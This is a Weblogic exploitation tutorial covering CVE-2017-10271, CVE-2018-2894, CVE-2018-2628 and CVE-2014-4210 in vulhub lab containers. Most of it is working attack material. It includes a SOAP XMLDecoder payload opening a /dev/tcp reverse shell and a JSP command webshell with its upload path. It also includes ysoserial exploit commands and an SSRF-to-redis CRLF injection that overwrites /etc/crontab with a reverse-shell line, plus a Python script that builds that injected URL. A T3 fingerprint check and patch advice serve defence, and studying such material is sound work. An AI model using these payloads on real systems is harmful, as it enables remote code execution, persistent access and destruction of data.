Middleware vulnerability record --6
catalogue
1, Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
2, Weblogic arbitrary file upload vulnerability (CVE-2018-2894)
3, Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)
4, Weblogic SSRF vulnerability (CVE-2014-4210)
1, Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
Affected versions according to Oracle's advisory: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. The WS-AT component parses the SOAP WorkContext header with java.beans.XMLDecoder, so an unauthenticated request can instantiate arbitrary classes such as java.lang.ProcessBuilder.
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d
2. Access
Open http://ip:7001/ in a browser. A Weblogic 404 page (rather than a connection error) indicates the environment is up; the container takes a minute or two to start.
3. Manual verification exploits
1> Access http://ip:7001/wls-wsat/CoordinatorPortType
If a WS-AT web service description page is returned instead of a 404, the wls-wsat component is deployed and the host may be vulnerable.
Default vulnerable URLs (all of them accept the same payload):
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
2> Intercept the request above (for example in Burp) and change it to a POST request
3> Put the XMLDecoder payload in the SOAP header to get a reverse shell. The WorkContext element is handed to java.beans.XMLDecoder, which builds a java.lang.ProcessBuilder from the String array and calls start(). The command is XML character data, so the & in the bash redirection must be written as &amp; and > as &gt;; a raw & makes the document unparsable and the request fails silently. Content-Type must be text/xml; Content-Length is omitted below because Burp or curl sets it to the actual body length.
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.129.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i &gt;&amp; /dev/tcp/192.168.129.225/1234 0&gt;&amp;1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
4> Start a listener on port 1234 on the attacker host (192.168.129.225) before sending the request; the shell connects back when the request is processed.
5> The same gadget can also write files, here through java.io.PrintWriter. The path is relative to the domain directory; 9j4dqk is the random deployment directory of the bea_wls_internal application in this environment and differs per installation, so confirm it (for example with a command-execution payload that lists tmp/_WL_internal/bea_wls_internal/) before relying on it. The written file is then reachable at http://ip:7001/bea_wls_internal/test.jsp.
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.129.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println"><string>
<![CDATA[
<% out.print("test"); %>
]]>
          </string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
4. With tools
Public exploitation tools for this CVE automate detection, command execution and file upload; they send the same SOAP payloads as above, so the manual steps are enough to understand what they do.
Repair suggestions
- Install Oracle's patch (CVE-2017-10271 is fixed in the October 2017 Critical Patch Update).
- If WS-AT is not needed, delete the wls-wsat component (wls-wsat.war) and restart; the /wls-wsat/ URLs above should then return 404.
2, Weblogic arbitrary file upload vulnerability (CVE-2018-2894)
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2018-2894
docker-compose up -d
2. Access http://ip:7001/console; it redirects to the login page.
3. Run docker-compose logs | grep password
The admin password is generated when the container starts and printed in the log; in this run the credentials were weblogic / Hzxon4k3.
4. Log in to the console, click base_domain, open the Advanced section of the configuration page, tick "Enable Web Service Test Page", then Save.
5. Modify the working directory
Visit http://your-ip:7001/ws_utc/config.do (reachable without authentication once the test page is enabled) and set Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
This is the static css directory of the ws_utc application. It is served without authentication, so anything written under it is directly reachable over HTTP. The 4mcj4y directory name is generated per deployment and will differ on other installations; confirm the real name inside the container before using the path.
6. Click Security -> Add and upload the webshell as a keystore file.
7. Open the developer tools (F12) and search the page source for tc_background; the entry shows the timestamp that was prefixed to the uploaded file name.
8. Access the file and it executes
http://192.168.129.129:7001/ws_utc/css/config/keystore/1637242302425_shell.jsp
In general: http://ip:7001/ws_utc/css/config/keystore/<timestamp>_<uploaded file name>
9. The webshell used (a classic JSP command shell: it runs the cmd parameter and prints the output)
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    // cmd.exe on Windows, the raw command elsewhere
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    } else {
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    // stream the process's stdout back into the page
    BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = reader.readLine()) != null) {
        out.println(line);
    }
}
%>
</pre>
</BODY></HTML>
3, Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)
The T3 listener on port 7001 deserializes attacker-controlled objects; a JRMP-based gadget makes the server fetch and deserialize a payload from an attacker-run JRMP listener.
ysoserial-cve-2018-2628, download link https://github.com/tdy218/ysoserial-cve-2018-2628/releases
exploit.py script, download link https://www.exploit-db.com/exploits/44553
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2018-2628
docker-compose up -d
2. Visit http://ip:7001/console; if the login page appears the environment is up.
3. Download the ysoserial-cve-2018-2628 tool and start a JRMP server on the attacker host
java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener 1234 Jdk7u21 "touch /tmp/hello"
Syntax: java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [attacker listening port] [gadget chain] "[command to execute]"
The gadget chain must be one whose classes exist on the target; Jdk7u21 is the chain used here.
4. Use exploit.py to send the T3 packet to Weblogic (http://your-ip:7001)
python2 exploit.py [target IP] [target port, default 7001] [path to ysoserial-0.1-cve-2018-2628-all.jar] [attacker IP] [attacker listening port] JRMPClient
5. Verify that the command executed
In the directory of the deployment environment run docker-compose exec weblogic bash and list /tmp.
The file hello created by the command confirms that it was executed.
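Before exploit.py sends the serialized object it performs the T3 handshake; the handshake alone is useful on its own, because the server's HELO line reveals whether the port speaks T3 and which version it runs, and it lets you check a T3 connection-filter rule (the usual mitigation, since the April 2018 patch for CVE-2018-2628 was bypassed by CVE-2018-2893) without firing a gadget chain. The following is an added Python example, not code from the page or from exploit.py; host and port are assumptions and the HELO format is the one Weblogic returns to this greeting.

```python
# Added example, not code from the original page or exploit.py: the T3 handshake
# used as a fingerprint / mitigation check. Host and port are assumptions.
import socket

# The greeting exploit.py sends before the serialized object.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"


def parse_t3_helo(data: bytes):
    """Parse the server reply, e.g. b'HELO:10.3.6.0.false\\nAS:2048\\nHL:19\\n\\n'.

    Returns (version, is_secure) or None when the reply is not a T3 HELO line,
    which is what you get from a closed port, an HTTP-only listener, or a
    connection filter that denies t3/t3s.
    """
    first = data.split(b"\n", 1)[0].decode("ascii", "replace")
    if not first.startswith("HELO:"):
        return None
    version, _, flag = first[5:].rpartition(".")
    if not version or flag not in ("true", "false"):
        return None
    return version, flag == "true"


def t3_fingerprint(host: str, port: int = 7001, timeout: float = 5.0):
    """Send the greeting and return (version, is_secure), or None if no T3 answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(T3_HELLO)
            return parse_t3_helo(s.recv(1024))
    except OSError:
        return None


if __name__ == "__main__":
    import sys
    # e.g. python3 t3check.py 192.168.129.129 7001
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
    result = t3_fingerprint(host, port)
    print("no T3 answer (filtered or not Weblogic)" if result is None
          else "T3 %s, secure=%s" % result)
```

A version of 10.3.6.0 or 12.x answering on 7001 is a T3 listener exposed to the caller; after adding a connection filter such as weblogic.security.net.ConnectionFilterImpl with a rule like `0.0.0.0/0 * 7001 deny t3 t3s`, the same check should return no T3 answer while the console on the same port keeps working over HTTP.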
4, Weblogic SSRF vulnerability (CVE-2014-4210)
1. Environment construction
docker + vulhub
cd vulhub/weblogic/ssrf
docker-compose up -d
2. Visit /uddiexplorer/SearchPublicRegistries.jsp. If the page loads normally, the uddiexplorer application is deployed and this vulnerability may exist.
3. Fill in any search text, click Search and capture the request
Change it from a POST to a GET request; the same parameters can be passed in the query string.
4. Probe the intranet
The operator parameter is the URL the server fetches, so it is the SSRF-controlled value. Point it at an open port such as http://127.0.0.1:7001/ and the response contains an error about the reply that was received rather than a connection failure.
If the port is closed, the response contains "could not connect over HTTP to server".
The difference between these error messages in the response tells you which intranet hosts and ports are open.
5. Inject HTTP headers and use Redis to get a reverse shell
The Weblogic SSRF has one important property: although the outbound request is a GET, %0d%0a in the operator value is passed through into the request as a CRLF line break, and some services (such as redis) treat each line as a separate command. That means this SSRF can be used to attack a redis server on the intranet.
1> First find the redis server on the intranet through the SSRF (the docker network segment is usually 172.*)
Run docker ps -a, then docker inspect <redis container id>
The container's IP address is shown at the bottom of the output
Probe whether port 6379 is open with the operator parameter, as in step 4
A response without the "could not connect" error shows that 6379 is open
2> Send redis commands that write the reverse shell into /etc/crontab
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/ip/Port 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
The \n padding keeps the cron line on its own line between the RDB binary bytes that save writes around it, and /etc/crontab requires the user field (root). save overwrites /etc/crontab with the RDB dump, so this is destructive outside a lab, and it only works when redis runs with permission to write to /etc.
URL-encode the commands, append them after the 6379 target in the operator value with %0D%0A between lines, and send the request
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.27.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.129.226%2F1234%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=abcd&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1
Host: 192.168.129.129:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://192.168.129.129:7001
Connection: close
Referer: http://192.168.129.129:7001/uddiexplorer/SearchPublicRegistries.jsp
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=HB0dhXTP4WZ1VGP9qGRkvYq25f0TnhZQPQ2Fy4hqc1JYhz8dnqzd!1867720999
Upgrade-Insecure-Requests: 1
3> Start a listener on the attacker host (192.168.129.226:1234) first; the cron entry runs every minute, so the shell connects back within a minute of the save.
Repair suggestions
- Apply Oracle's patch for CVE-2014-4210.
- Or delete SearchPublicRegistries.jsp from the uddiexplorer application (or remove uddiexplorer entirely if it is not used) and restart the server.
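Steps 4 and 5 above, as an added Python example (not code from the original page): it builds the CRLF-injected operator value from plain redis commands, so the long URL-encoded request does not have to be assembled by hand, and classifies the probe responses from step 4 using the error string quoted there. Addresses, ports and the sample response bodies are constructed for the example.

```python
# Added example, not code from the original page: assembles the step-5 operator
# value from plain redis commands and classifies step-4 probe responses.
# Addresses, ports and the sample bodies are constructed.
from urllib.parse import parse_qs, quote, urlencode, urlparse

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
CLOSED_MARKER = "could not connect over HTTP to server"  # error text quoted on the page


def cron_reverse_shell(ip: str, port: int, user: str = "root") -> str:
    """The /etc/crontab line. The literal \\n escapes are expanded by redis's
    inline quoting, which isolates the line from the RDB binary that SAVE
    writes around it; the user field is mandatory in /etc/crontab."""
    line = f"0-59 0-23 1-31 1-12 0-6 {user} bash -c 'sh -i >& /dev/tcp/{ip}/{port} 0>&1'"
    return "\\n\\n\\n\\n" + line + "\\n\\n\\n\\n"


def redis_crontab_commands(ip: str, port: int) -> list:
    """The four redis commands from step 5 2>."""
    return [
        f'set 1 "{cron_reverse_shell(ip, port)}"',
        "config set dir /etc/",
        "config set dbfilename crontab",
        "save",
    ]


def build_operator(redis_host: str, commands: list, redis_port: int = 6379) -> str:
    """Raw operator value. The first CRLF CRLF ends the request line Weblogic
    builds, each command sits on its own line, and the trailing 'aaa' soaks up
    the ' HTTP/1.1' suffix so it becomes one more unknown command to redis."""
    return (
        f"http://{redis_host}:{redis_port}/test\r\n\r\n"
        + "\r\n".join(commands)
        + "\r\n\r\naaa"
    )


def build_ssrf_url(base_url: str, operator: str) -> str:
    """The GET from step 3 with the injected operator. quote (not quote_plus)
    is used so spaces become %20 and CR/LF become %0D%0A as on the page."""
    params = {
        "operator": operator,
        "rdoSearch": "name",
        "txtSearchname": "abcd",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Business location",
        "btnSubmit": "Search",
    }
    return base_url.rstrip("/") + UDDI_PATH + "?" + urlencode(params, quote_via=quote)


def operator_from_url(url: str) -> str:
    """Decode the operator back out of a built URL (what the server will fetch)."""
    return parse_qs(urlparse(url).query)["operator"][0]


def classify_probe(body: str) -> str:
    """Step 4: 'closed' when the page says it could not connect; any other error
    means the target answered (for an open non-HTTP port Weblogic complains
    about the reply instead), so report 'open'; no body at all is 'unknown'."""
    if not body:
        return "unknown"
    return "closed" if CLOSED_MARKER in body else "open"


if __name__ == "__main__":
    # Constructed lab addresses matching the page's environment.
    cmds = redis_crontab_commands("192.168.129.226", 1234)
    print(build_ssrf_url("http://192.168.129.129:7001",
                         build_operator("172.27.0.2", cmds)))
```

Send the printed URL with curl or a browser while the listener is running; operator_from_url shows the exact lines redis will receive, which is the quickest way to spot an encoding mistake before sending.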